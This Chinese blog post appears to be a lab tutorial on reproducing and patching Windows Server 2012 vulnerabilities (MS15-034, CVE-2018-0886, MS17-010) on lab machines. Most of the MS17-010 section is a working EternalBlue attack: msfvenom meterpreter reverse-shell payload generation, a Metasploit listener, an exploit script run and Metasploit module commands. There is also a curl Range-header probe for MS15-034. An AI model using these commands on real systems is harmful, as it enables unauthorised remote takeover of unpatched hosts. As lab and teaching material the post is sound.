windows server 2012主机漏洞-复现-修复

最新推荐文章于 2024-06-13 12:19:44 发布
最新推荐文章于 2024-06-13 12:19:44 发布
阅读量1w 收藏 17
点赞数 5
分类专栏: 主机漏洞 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42881032/article/details/108621530
版权

windows server 2012主机漏洞

目录

Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)

先看服务器是否需要iis服务器,不需要 就不用处理此漏洞

wDs31e.png

复现

使用curl 工具 测试

curl http://192.168.68.200 -H "Host: 192.168.68.200" -H "Range: bytes=0-18446744073709551615"

出现Requested Range Not Satisfiable说明存在此漏洞

非补丁解决办法

Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886)

远程链接漏洞,有一方没有更新此漏洞 ,在远程连接是会显示身份验证错误

漏洞公告

漏洞补丁

Microsoft Windows SMB 远程代码执行漏洞(CVE-2017-0148)(MS17-010)

使用kali,利用漏洞攻击靶机

129 的是win7的 200的是server2012的

靶机winserver 2012

靶机需要

  • 关闭防火墙

  • 打开来宾账号

kali需要

  • python工具(主要需要 impacket,pycrypto 模块)

  • nasm 是一款基于80x86和x86-64平台的汇编语言编译程序,其设计初衷是为了实现编译器程序跨平台和模块化的特性

  • eternalblue_kshellcode_x64.asm(Sleepya开发的内核shellcode)

  • ternalblue_exploit8.py(Sleepya开发的漏洞利用的python程序)

wget 或者xftp 拿到 eternalblue_kshellcode_x64.asm文件

#使用nasm 编译
nasm -f bin eternalblue_kshellcode_x64.asm

再使用msfVENOM生成一个用户的反弹shellcode攻击载荷

msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=192.168.68.128 LPORT=9090

合并内核shellcode和payload

cat eternalblue_kshellcode_x64 meterpreter_msf.bin > metasploit_msf.bin

设置监听

msfconsole
#使用handler模块
use exploit/multi/handler
#设置载荷
set PAYLOAD window/x64/meterpreter/reverse_tcp
#设置攻击机ip 和端口
set lhost 192.168.68.128
set lport 9090
#攻击
exploit

再开一个命令窗口

python eternalblue_exploit8.py 192.168.68.200 metasploit_msf.bin 400

如果报缺少模块的错误

需要安装模块

#下载
wget  https://files.pythonhosted.org/packages/23/18/611a288acba72f59dce509cc3e68fe390d3bdaa00ce4d0b4686e599c951b/impacket-0.9.12.tar.gz
#解压
tar zxvf impacket-0.9.12.tar.gz
#进入解压目录安装
cd impacket-0.9.12
python setup.py install
#同时还需要pycrypto模块
pip install pycrypto --index-url http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com
(pip是python的包管理工具 没有的 可以执行 apt-get install python-pip)

如果没有收到反弹的shell或者出现蓝屏重启,可以增加或减少数值

wWuzi4.jpg

wWKSJJ.jpg

wWiklD.png

安装补丁

wWnB3n.jpg

继续使用kali攻击 未出现蓝屏重启的情况

靶机 win7 x64作为靶机进行攻击。

nmap 192.168.68.*
#扫描

wWmf6P.jpg

#进入msfconsole 
msfconsole  
#查找ms17-010漏洞模块
search ms17-010
#使用扫描模块进行漏洞扫描
use auxiliary/scanner/smb/smb_ms17_010
#设置靶机ip
set rhost 192.168.68.129
#查看属性
show options
#开始扫描
run

wWmVoQ.jpg

可以看到 疑似存在 ms17-010漏洞 接着可以攻击

#使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue
#设置靶机ip
set rhost 192.168.68.129
#查看属性 
options
#攻击
run

wWZ2AH.jpg

可以看到已经获取靶机权限

公告地址

漏洞补丁地址

雪花勇闯天涯
关注
  • 5
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
windows Server 2012 R2 修复漏洞“CVE-2015-2808““CVE-2016-2183““CVE-2013-2566“
qq_40954183的博客
09-10 5777
在搜索栏输入编辑组打开本地组策略编辑器 计算机配置->管理模板->网络->SSL配置设置 双击SSL 密码套件顺序 点选已启用,先备份原SSL 密码套件,再替换SSL 密码套件 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256_P256,TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256_P384,TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256_P521,TLS_ECD..
CVE-2012-1889漏洞利用
enjoy5512的博客
09-25 3732
ROP技术绕过DEP保护 Heap Spray技术绕过ASLR保护 CVE-2012-1889
CVE2012-0002(ms12-020)蓝屏漏洞利用
2302_81096429的博客
05-09 669
ms12-020(漏洞全称:Microsoft Windows 远程桌面协议远程代码执行漏洞漏洞是一个远程代码执行漏洞。输入use 0使用漏洞扫描模块,进入后使用show options查看可使用选项设置rhosts为靶机ip。0 auxiliary/scanner/rdp/ms12_020_check是漏洞扫描模块。back返回用use 1使用攻击载荷模块,剩下操作与漏洞扫描模块一样,run执行。设置rhosts为靶机ip,设置完成后run执行,执行后显示漏洞可利用。3.搜索ms12-020漏洞
MS17_010永恒之蓝漏洞利用与安全加固记录
最新发布
wdnmddbl的博客
06-13 787
路漫漫其修远兮,吾将上下而求索。EternalBlue达到其攻击目的事实上利用了3个独立的漏洞:第一个也就是 CVE-2017-0144被用于引发越界内存写;第二个漏洞则用于绕过内存写的长度限制;第三个漏洞被用于攻击数据的内存布局。如果病毒成功入侵或攻击端口,就会从远程服务器下载病毒代码,进而横向传播给局域网内其他电脑。同时,该病毒还会在被感染电脑中留下后门病毒,以准备进行后续的恶意攻击,不排除未来会向用户电脑传播更具威胁性病毒的可能性,例如勒索病毒等。
CVE-2018-0886
热门推荐
龙卷风摧毁停车场
03-15 1万+
Windows Remote Desktop Protocol (RDP) 中存在的漏洞,也称为 CredSSP 漏洞。该漏洞允许在目标系统上执行任意代码,不需要身份验证。在 RDP 连接过程中,Windows 使用 “CredSSP”(Credential Security Support Provider)安全协议验证用户身份。该协议使用加密算法保护凭证传输过程,通过双方协商的方式选择使用哪种加密算法。
Windows Server 2012 R2修复CredSSP 远程执行代码漏洞(CVE-2018-0886)
Linux I Tell U
11-16 4035
是一个Microsoft Windows CredSSP(Credentials Security protocol)的远程执行代码漏洞。CredSSP是一种用于远程认证的安全协议,它允许远程用户通过安全通道访问本地资源。这个漏洞的起因是CredSSP在处理某些类型的网络请求时存在一个错误,这使得攻击者能够在受害者的计算机上执行任意代码。攻击者可以通过构造一个恶意的网络请求,利用这个漏洞来获取受害者的系统权限,并进行任意操作。
windows server 2012漏洞
2301_81305520的博客
03-07 734
windows server 2012漏洞
windows server 2012 R2 解决漏洞(CVE-2018-0886)--避了很多坑
CR
11-04 8755
系统: windows server 2012 R2 standard 扫描出漏洞: Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886)【原理扫描】 按照微软官方给的答案 https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2018-0886,对应下载安装包是 KB4103725 或 KB4103715 但是下载后安装 报错: 此更新不适用此计算机。 按照百度教程中 :
利用MSF溢出漏洞提权windows server2012
qq_53409748的博客
03-29 1162
使用Kali Linux平台的“metasploit framework”工具,针对Windows2012R2操作系统,上传EXP实系统提权。
Windows漏洞修复服务器,Windows运维之Windows Server中的IIS漏洞以及修复方法
weixin_31533357的博客
08-01 837
你可能无法触及应用层面的漏洞,但是在服务器层面你有很多事情可以做到使基于IIS的系统更加安全。通过回顾我多年的网站安全评估项目,可以指出以下最影响Windows服务器的IIS漏洞。我可以有把握地说,对于Windows服务器管理员来说普遍的目标是拥有适当弹性的系统。世界上有很多网络安全威胁,你最不希望发生的是在世界的另一头,或者在你的组织内部有人利用了IIS或者Windows漏洞,而这一切都是本来...
Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本
10-06
Windows Server 合规漏洞修复修复Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本,基于Windows PowerShell, 兼容Windows Server 2016/2019,防止Sweet32 生日攻击
微软Windows自动更新带漏洞修复
09-06
Windows更新漏洞修复 电脑修复专家 系统漏洞修复 漏洞修复
Windows漏洞分析工具】wesng下载、命令选项、示例、使用方法
05-21 2623
漏洞分析】补丁更新情况
ms17-010
qq_54735393的博客
11-02 372
EhernalBlue通过Tcp端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只需要开机上网,攻击者就能在电脑和服务器中植入勒索软件。
漏洞利用五:微软其他类型漏洞利用
ZY95001的博客
09-04 443
一、 二、 三、
Windows CVE-2022-21907漏洞
qq_53579360的博客
11-13 1883
漏洞
server 2012漏洞
04-04
作为AI语言模型,我无法直接进行漏洞,但是我可以向您提供一些有关Windows Server 2012漏洞的信息。 Windows Server 2012是一种操作系统,它可能存在多个漏洞,包括但不限于以下几种: 1. SMBv1漏洞:SMBv1是旧版的Windows共享文件协议,它存在多个安全漏洞,包括EternalBlue等。攻击者可以通过利用这些漏洞,远程执行恶意代码或者发起拒绝服务攻击。 2. 远程桌面漏洞Windows Server 2012中的远程桌面协议也存在多个漏洞,攻击者可以通过利用这些漏洞,远程执行恶意代码或者获取敏感信息。 3. IIS漏洞Windows Server 2012中的IIS也存在多个漏洞,攻击者可以通过利用这些漏洞,上传恶意文件、远程执行代码或者获取服务器权限等。 如果您需要进行Windows Server 2012漏洞的实验,建议您在受控环境下进行,以避免对生产环境造成影响。同时,也请您遵循相关法律法规和道德规范,不要利用漏洞进行非法活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值